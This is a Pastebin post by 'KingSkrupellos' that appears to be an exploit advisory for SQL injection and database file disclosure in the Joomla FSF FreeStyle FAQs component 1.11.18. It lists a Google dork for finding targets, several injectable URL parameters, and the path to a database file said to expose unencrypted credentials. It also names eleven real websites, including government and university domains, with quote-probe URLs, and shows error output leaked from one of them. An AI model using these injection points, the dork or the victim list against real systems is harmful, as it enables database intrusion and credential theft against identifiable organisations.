KingSkrupellos

Joomla FSF FreeStyle FAQs 1.11.18 SQL Inj DB Disclosure

Feb 3rd, 2019
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.38 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla FSF FreeStyle FAQs Components 1.11.18 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/02/2019
  7. # Vendor Homepage : freestyle-joomla.com
  8. # Software Download Link : freestyle-joomla.com/products/support/freestyle-faqs-lite
  9. # Software Information Link : extensions.joomla.org/extension/freestyle-faqs/
  10. # Software Version : 1.11.18 and previous versions.
  11. # Software Technical Requirements : Joomla 3.5 and above PHP 5.3 or later - MySQL 5.x
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_fsf''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. CWE-200 [ Information Exposure ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27.  
  28. Freestyle FAQ is designed to provide you with a highly customised
  29.  
  30. Frequently Asked Questions (FAQs) module on your Joomla website.
  31.  
  32. FAQs can be organised in to multiple categories, you can add tags to FAQS
  33.  
  34. to allow similar questions from users to be grouped together.
  35.  
  36. Provides you with a free comprehensive FAQ solution for your website.
  37.  
  38. The product includes a built in glossary, multiple view options and a category listing module.
  39.  
  40. ####################################################################
  41.  
  42. # Impact :
  43. ***********
  44.  
  45. Joomla FSF FreeStyle FAQs 1.11.18 component for Joomla and other versions
  46.  
  47. is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  48.  
  49. user-supplied data before using it in an SQL query.
  50.  
  51. Exploiting this issue could allow an attacker to compromise the application,
  52.  
  53. access or modify data, or exploit latent vulnerabilities in the underlying database.
  54.  
  55. A remote attacker can send a specially crafted request to the vulnerable application
  56.  
  57. and execute arbitrary SQL commands in application`s database.
  58.  
  59. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  60.  
  61. An attacker can exploit this issue using a browser.
  62.  
  63. * A DAT file is a generic data file created by a specific application.
  64.  
  65. It may contain data in binary or text format (text-based DAT files can be viewed in a text editor).
  66.  
  67. DAT files are typically accessed only by the application only by owners.
  68.  
  69. * This Software prone to an information exposure/database disclosure vulnerability.
  70.  
  71. Successful exploits of this issue may allow an attacker to obtain sensitive
  72.  
  73. information by downloading the full contents of the application's database.
  74.  
  75. * Any remote user may download the database files and gain access
  76.  
  77. to sensitive information including unencrypted authentication credentials.
  78.  
  79. ####################################################################
  80.  
  81. # SQL Injection Exploit :
  82. **********************
  83.  
  84. /index.php?option=com_fsf&view=faq&catid=&Itemid=[SQL Injection]
  85.  
  86. /index.php?option=com_fsf&view=faq&catid=[ID-NUMBER]&Itemid=[SQL Injection]
  87.  
  88. /index.php?option=com_fsf&view=faq&catid=1&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  89.  
  90. /index.php?option=com_fsf&catid=[ID-NUMBER]&view=faq&Itemid=[ID-NUMBER]&tmpl=component&faqid=[SQL Injection]
  91.  
  92. # Database Disclosure Exploit :
  93. ***************************
  94.  
  95. /administrator/components/com_fsf/database_fsf.dat
  96.  
  97. ####################################################################
  98.  
  99. # Example Vulnerable Sites :
  100. *************************
  101.  
  102. [+] dtps.gov.za/index.php?option=com_fsf&view=faq&catid=1&Itemid=231&limitstart=10%27
  103.  
  104. [+] dtps.gov.za/administrator/components/com_fsf/database_fsf.dat
  105.  
  106. [+] han.gov.cv/index.php?option=com_fsf&view=faq&catid=2&Itemid=314%27
  107.  
  108. [+] culture.gov.bf/index.php?option=com_fsf&view=faq&catid=0&Itemid=927%27
  109.  
  110. [+] zaer.um.ac.ir/index.php?option=com_fsf&view=faq&catid=1&Itemid=589%27
  111.  
  112. [+] brmi.org/index.php?option=com_fsf&view=faq&catid=&Itemid=264%27
  113.  
  114. [+] solovue.com/index.php?option=com_fsf&catid=1&view=faq&Itemid=155&tmpl=component&faqid=8%27
  115.  
  116. [+] goomass.com/index.php?option=com_fsf&view=faq&catid=-4&Itemid=235%27
  117.  
  118. [+] dry247.com/dry247/index.php?option=com_fsf&view=faq&catid=1&Itemid=130%27
  119.  
  120. [+] penthalaz.ch/v2/index.php?option=com_fsf&view=faq&catid=1&Itemid=1%27
  121.  
  122. [+] emekhashaveh.org/index.php?option=com_fsf&view=faq&catid=1&Itemid=597%27
  123.  
  124. ####################################################################
  125.  
  126. # Example SQL Database Error :
  127. ****************************
  128.  
  129. Deprecated: Non-static method SEFConfig::getConfig() should not be
  130. called statically, assuming $this from incompatible context in /home2
  131. /solovue/public_html/plugins/system/joomsef/joomsef.php on line 231
  132.  
  133. Deprecated: Non-static method FSF_Settings::GetViewSettingsObj()
  134. should not be called statically, assuming $this from incompatible context in
  135. /home2/solovue/public_html/components/com_fsf/models/faq.php on line 40
  136.  
  137. ####################################################################
  138.  
  139. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  140.  
  141. ####################################################################
Add Comment
Please, Sign In to add comment